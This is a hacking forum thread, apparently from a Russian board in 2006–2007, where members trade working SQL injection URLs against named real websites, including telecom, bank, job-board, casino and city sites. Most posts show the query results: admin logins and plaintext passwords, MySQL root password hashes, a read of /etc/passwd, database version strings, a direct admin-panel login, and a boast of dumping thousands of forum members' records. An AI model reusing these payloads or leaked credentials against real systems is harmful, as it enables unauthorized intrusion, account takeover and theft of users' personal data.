SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. FFFFx029A

    FFFFx029A Member

    Is this actually exploitable? (MSSQL)
    http://www.reonline.ru/offers/556623.cnt?page=2&o_object=3'&o_type=1
     
  2. Scipio

    Scipio Well-Known Member

    Administering the MegaFon forum

    Well, overall there is nothing complicated here, so I'm posting it here, and the mods can decide what to do with it...

    Anyway, I found an SQL injection:
    Code:
    http://bashkortostan.[B][COLOR=Red]megafonvolga.ru[/COLOR][/B]/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(user,':',password),4,5,6,7+from+mysql.user/*
    I think everyone knows what this is, but it can't be put to use, since only port 80 (HTTP) is open on the server.
    I saw that the server hosts a forum (it serves all of MegaFon Povolzhye); the forum is custom-written, so I had to rely on intuition, and it did not let me down:
    Code:
    http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,3,4,5,6,7+from+[B]forumusers[/B]/*
    Next I had to guess the column names. Almost every table like this has an id field, so all that remains is to find the prefix (or something like it). Again, intuition together with logic did not let me down:
    Code:
    http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,[B]fu_id[/B],4,5,6,7+from+forumusers/*
    From there, guessing the remaining columns is routine, and here is the final result:
    Code:
    [B]http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(fu_name,':',fu_pwd),4,5,6,7+from+forumusers+where+fu_id=1/*[/B]
    As we can see, the password is in plaintext; we log in to the forum and become admins... To get into the admin panel, click the "avatars" link at the top; a basic-auth window appears, we enter the same login/password into it and administer the forum... that's all...

    P.S. I also found these tables there:
    Code:
    news
    dealers
    phones
    P.P.S. The forum login/password also works for the shop.
     
    2 people like this.
  3. kair

    kair Elder - Старейшина

    Code:
    http://www.butterslice.com/browsecats.php?cid=51%20union%20select%201,concat(sb_pwd,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    pcquestnb:pcquestnb

    Code:
    http://www.ro-jobs.ro/browsecats.php?cid=48%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    admin:q7w7e7r7

    Code:
    http://ph.jobcentralasia.com/browsecats.php?cid=46%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    admin:qwertyuiop

    Code:
    http://www.buljob.com/search_result.php?cid=970000%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    admin:I4ipBuOFUSuVaak2Y66*
     
    3 people like this.
  4. SWAT

    SWAT Elder - Старейшина

    Code:
    http://www.host.uzip.uz/search_result.php?cid=-10+union+select+1,VERSION(),3,4/*
    Code:
    http://www.all-horse-classifieds.com/browsecats.php?cid=-26+union+select+1,VERSION(),3,4,5/*
     
    #3264 SWAT, 10 Oct 2007
    Last edited: 10 Oct 2007
    1 person likes this.
  5. sasTO

    sasTO Banned

    Official site of the city of Bălți :)

    Code:

    http://www.beltsy.md/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=-1+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12+from+sedoi_users/*
    ____________________________________________________________



    www.seejob.md


    Code:

    http://www.seejob.md/?page=view&t=0&id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(table_name,0x3a,column_name),15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+limit+1374,1/*
     
    #3265 sasTO, 10 Oct 2007
    Last edited: 10 Oct 2007
    2 people like this.
  6. Underwit

    Underwit Banned

    http://www.bmoca.org/admin/

    username:bmoca
    password:bm0c@
     
    1 person likes this.
  7. it's my

    it's my Banned

    http://www.ur0mc.com/ru/photo.php?id=-1+union+select+1,version()/*
     
    1 person likes this.
  8. Maxyks

    Maxyks Banned

    Code:
    http://www.dandbpoker.com/book_detail.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,data base()),5,6,7,8,9,10,11,12,13,14/*
    [email protected]:4.1.22-standard-log:harakis
    Code:
    http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3 a,database()),4,5,6/*&parent=
    mediamarket@localhost:5.0.33:mmg_hpoker
    Code:
    http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,password),4,5 ,6+from+mys ql.user+limit+0,1/*&parent=
    root:*E459468099CBA6AEE7E679233A154F2DA83C23F8
    banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B6E8307E1
    mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B66CF7
    Code:
    http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,versio n(),0x3a,database()),4, 5,6/*& parent=
    mediamarket@localhost:5.0.33:mmg_pokertut
    Code:
    http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,pa ssword),4,5,6 +from+mysql.us er/* &parent=
    root:*E459468099CBA6AEE7E679233A154F2DA83C23F8
    banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B6E8307E1
    mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B66CF7
    Code:
    http://www.casino-fr-bonus.com/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,vers ion(),0x3a,database()),6,7,8,9,10,11/*
    [email protected]:5.0.22-Debian_2-log:user9718a1
    h*tp://www.grandscasinos.com /it/id.php?ID=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*
    h*tp://www.casino-online-fr.com /ru/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11
    h*tp://www.7casinoonline.com /it/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11
    h*tp://www.equipodepoker.com /index.php ' or 1=1/*
    h*tp://www.rakemeback.com /my-account/ ' or 1=1/*
     
    4 people like this.
  9. AFoST

    AFoST Elder - Старейшина

    http://acc.com/php/cms/index.php?id=1/**/union/**/select/**/null,null,null,null/**/from/**/user--
     
  10. sasTO

    sasTO Banned

    DOS CREDO BANK


    Code:


    http://www.credo.com.kg/news/?id=-8+union+select+1,cast(concat_ws(0x3a,version(),user(),database())+as+binary)/*

    ! HELP !

    It's MySQL 5, but I still couldn't get the columns and tables to output through information_schema! What's the catch here?
     
    #3270 sasTO, 11 Oct 2007
    Last edited: 11 Oct 2007
    2 people like this.
  11. te$t

    te$t Elder - Старейшина

    Code:
    http://www.ubisoft.ru/games/game.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11+from+news/*
     
    1 person likes this.
  12. ElteRUS

    ElteRUS Elder - Старейшина

    starz.ru
    http://starz.ru/photo/?celeb=-64+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3/*


    uralmoto.ru login/hash/UIN
    http://uralmoto.ru/stories.php?sid=-1'+union+select+1,2,3,4,5,concat(username,0x3a,user_password,0x3a,user_icq),7,8,9,10,11,12+from+phpbb_users+limit+1,1/*

    I hope these aren't reposts ))
     
    3 people like this.
  13. SVAROG

    SVAROG Elder - Старейшина

    http://sc-ufa.uraltb.ru/?id=99999+union+select+1,2,3/*
     
  14. b3

    b3 Banned

    Hashes:
    member:4e4d6c332b6fe62a63afe56171fd3725 decrypted:haha
    ian:919b720497e91197077a706775c5a9ad
    adam:2e456fdbaadea50686a5809d9c540243
    http://www.lanchesterbrassband.org.uk/login.php member:haha
     
    1 person likes this.
  15. sasTO

    sasTO Banned

    Ordering girls :) ...


    Code:


    http://elit.tv/index.phtml?id=-42+union+select+1,concat_ws(0x3a,id,name,passwd),3,4,5,6,7,8,9,10,11+from+admin_users/*


    ...but first we need to find the admin panel ;)
     
    2 people like this.
  16. 0nep@t0p

    0nep@t0p Elder - Старейшина

    ZAO "MOSSTROYECONOMBANK"
    Version: 5.0.41-log
    usoftadmin:f02539ca4eff95f24c00d82eb62e275e:xtrfen
    mseb:6d390ae485e95ceac9ce280f02d0c409
    Too bad I couldn't find the admin panel (
     
    2 people like this.
  17. Red_Red1

    Red_Red1 Banned

    2 0nep@t0p
    http://www.mseb.ru/adm/login.php?ref=%2Fadm%2Findex.php here is the admin panel
     
    1 person likes this.
  18. ElteRUS

    ElteRUS Elder - Старейшина

    http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),icq_number,concat(ip_address,0x3a,email),7,8+from+vitz_forums.ibf_members/*

    The whole database at once: name\hash\UIN\IP\email, 5931 records ) too bad it's IPB (
     
    2 people like this.
  19. NOmeR1

    NOmeR1 Everybody lies

    4.1.21-standard
    barrowfc_results
    barrowfc_barrowf@localhost


    4.0.24
    enlajugada
    enlajugada@localhost


    4.1.22-standard
    henrybcu_dbflatam
    henrybcu_f1lat07@localhost


    5.0.45-community-log
    Sql154922_1
    [email protected]
     
    #3279 NOmeR1, 12 Oct 2007
    Last edited: 12 Oct 2007
    3 people like this.
  20. ElteRUS

    ElteRUS Elder - Старейшина

    www.autozel.ru

    http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13/*

    4.1.11:autozel1_aaaa:website@localhost

    http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,user_icq),5,6,7,8,9,10,11,12,13+from+phpbb_users+limit+1,1/*

    name \ hash \ UIN
     
    1 person likes this.